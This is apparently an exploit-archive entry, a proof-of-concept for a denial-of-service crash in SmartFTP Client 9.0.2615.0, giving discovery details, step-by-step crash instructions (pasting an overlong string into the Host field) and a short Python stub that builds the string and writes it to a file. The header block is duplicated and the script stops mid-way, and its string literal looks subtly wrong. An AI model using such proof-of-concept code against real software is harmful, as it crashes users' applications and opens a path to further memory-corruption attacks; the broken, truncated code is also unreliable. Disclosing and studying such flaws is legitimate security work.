#Exploit Title: SmartFTP Client 9.0.2615.0 - Denial of Service (PoC)
#Discovery by: Victor MondragA3n
#Discovery Date: 2018-10-30
#Vendor Homepage: https://www.smartftp.com/en-us/
#Exploit Title: SmartFTP Client 9.0.2615.0 - Denial of Service (PoC)
#Discovery by: Victor MondragA3n
#Discovery Date: 2018-10-30
#Vendor Homepage: https://www.smartftp.com/en-us/
#Software Link: https://www.smartftp.com/en-us/download
#Tested Version: 9.0.2615.0
#Tested on: Windows 10 Single Language x64

#Steps to produce the crash:
#1.- Run python code: SmartFTP_9.0.2615.0_Denial_of_Service_(PoC).py
#2.- Open network.txt and copy content to clipboard
#2.- Open SmartFTP Client
#3.- Select Connection
#4.- Paste ClipBoard on "Host"
#5.- Crashed

cod = "x41" * 300

f = open('network.txt', 'w')